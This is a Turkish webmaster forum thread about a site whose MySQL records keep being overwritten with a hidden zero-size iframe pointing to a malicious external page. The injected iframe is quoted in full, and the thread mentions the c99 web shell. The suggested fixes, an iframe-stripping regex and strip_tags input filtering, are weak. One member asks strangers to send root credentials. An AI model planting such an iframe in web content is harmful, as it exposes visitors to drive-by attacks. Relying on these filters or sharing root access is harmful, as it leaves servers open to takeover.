mysql'e sızma hakkında yardım edebilecek birileri var mı?

0
Onaylı Üye
Üye
Katılım
20 Kasım 2005
Mesajlar
2,662
Tepki puanı
32
Merhaba arkadaşlar.
Bir sitemin mysql'ine sızarak virüs yaymaya çalışıyorlar. Muhtemelen bir yerde açık var ama henüz bunu bulabilmiş/anlayabilmiş değilim. Ve bu şekilde devam ederse zararlı site uyarısı kaçınılmaz görünüyor. Bir an önce bu problemi çözmem lazım.
Bunun önüne nasıl geçebilirim? Açık nerede olabilir? Veya yardımcı olabilecek birileri var mı?

Şimdiden teşekkürler.
 
1
Onaylı Üye
Üye
Katılım
24 Ocak 2005
Mesajlar
7,131
Tepki puanı
86
Eklenen kod bir html, script kodumudur ?

birde bu eklenen virüs kodunun sitenize kullanıcıların ekleme yaptığı ( yorum ) gibi bir alandan gelme ihtimali var. Bu bölümde gelen bilgileri veya herhangi bir yerdeki değişkenleri ( GET,POST .. ) bir filtreden geçirmiyorsanız kodlar eklenebilir.
 
0
Onaylı Üye
Üye
Katılım
20 Kasım 2005
Mesajlar
2,662
Tepki puanı
32
Hayır o şekilde gelmiyor.
iframe ile bir siteye yönlendiriliyor.
Kod :

<iframe src="http://bomberoslb.com.ar/logs/index.html" width="0" height="0" frameborder="0"> </iframe>
 
0
Onaylı Üye
Üye
Katılım
29 Ocak 2010
Mesajlar
1,489
Tepki puanı
16
hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.
 
0
Onaylı Üye
Üye
Katılım
3 Şubat 2010
Mesajlar
328
Tepki puanı
8
Konum
istanbul
mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.
 
0
Onaylı Üye
Üye
Katılım
20 Kasım 2005
Mesajlar
2,662
Tepki puanı
32
Zeki hayır canım. Sadece iframe var. js dosyası yok. Yine de bir bakayım. :rolleyes:
 
0
Onaylı Üye
Üye
Katılım
20 Kasım 2005
Mesajlar
2,662
Tepki puanı
32
mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.

mysql'e ekleniyor.

Sql'de kayıtlı olan bir konu değiştirilip iframe basılıyor onun yerine. Mesela bir kategori adı var ABC olarak.
O ABC kategorisi direk iframe kodu oluyor. :(
 
0
Onaylı Üye
Üye
Katılım
3 Şubat 2010
Mesajlar
328
Tepki puanı
8
Konum
istanbul
PHP:
function noiframe($data) {
    $data = preg_replace('#<iframe.*?</iframe>#si', '', $data);
    return $data;
}

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin
 
0
Onaylı Üye
Üye
Katılım
29 Ocak 2010
Mesajlar
1,489
Tepki puanı
16
Bunu yapan pezevengi sende biliyorsun , şerefsiz bizlerin üzerinden adsense kasıyor, benim ie yide kitledi.

MSN geldiğinde görüşelim fakat bu olay scriptle alakası yok bu olayın alakası ortak bizim, geldiğinde görüşelim.
 
E
Erturk
Misafir
PHP:
function noiframe($data) {
    $data = preg_replace('#<iframe.*?</iframe>#si', '', $data);
    return $data;
}

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin

Invictus arkadasımız guzel bir fonksiyon vermiş. Gayet mantıklı. Fakat bunun yerine form uygulamalarından gelen verileri htmlspecialchars(strip_tags($_POST['postadi'])); seklinde süzsenizde kafi olacaktır. Her iki türlüde sıkıntı yasamazsınız.
 
0
Onaylı Üye
Üye
Katılım
29 Ocak 2010
Mesajlar
1,489
Tepki puanı
16
Invictus verdiğin kodu deniyelim bakalım.
Fakat sql sorgusu ile halledemezmiyiz bunu ? Yoksa tüm input kullanılan yerlere eklemeye kalkarsak script baya karışık baya güç olucak.
 
0
Onaylı Üye
Üye
Katılım
20 Kasım 2005
Mesajlar
2,662
Tepki puanı
32
Hemen deneyeceğim.

exe'sini versem, açabilecek bir babayiğit bulunur mu acep? :)
 
0
Onaylı Üye
Üye
Katılım
3 Ağustos 2009
Mesajlar
835
Tepki puanı
7
ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi :) erturk un dedigi gibi gelen verileri suzmenizde fayda var..
 
0
Onaylı Üye
Üye
Katılım
29 Ocak 2010
Mesajlar
1,489
Tepki puanı
16
ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi :) erturk un dedigi gibi gelen verileri suzmenizde fayda var..

Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.
 
0
Onaylı Üye
Üye
Katılım
3 Ağustos 2009
Mesajlar
835
Tepki puanı
7
Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.
hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum :D
 
0
Onaylı Üye
Üye
Katılım
29 Ocak 2010
Mesajlar
1,489
Tepki puanı
16
hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum :D

Aynı şeyi düşünüyoruz aslında, neyse arkadaş bakıyor bakalım, iframe değişkenini engelliyecek komple umarım başarılı olur.
 
0
Onaylı Üye
Üye
Katılım
13 Kasım 2006
Mesajlar
6,192
Tepki puanı
44
Konum
localhost
hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.

Ben bunun için geçiçi çözüm ürettim.
Dedicated sunucusu üzerinde sitelerine bu virus bulaşan varsa daha detaylı inceleyebilirim.

Varsa Dedicated sunucunuz ücretsiz inceleyebilirim.
Root bilgilerinizi, virusun bulaştığı siteyi, ornek konu linklerini gönderin bu aksam inceleyeyim.
 
Geri
Üst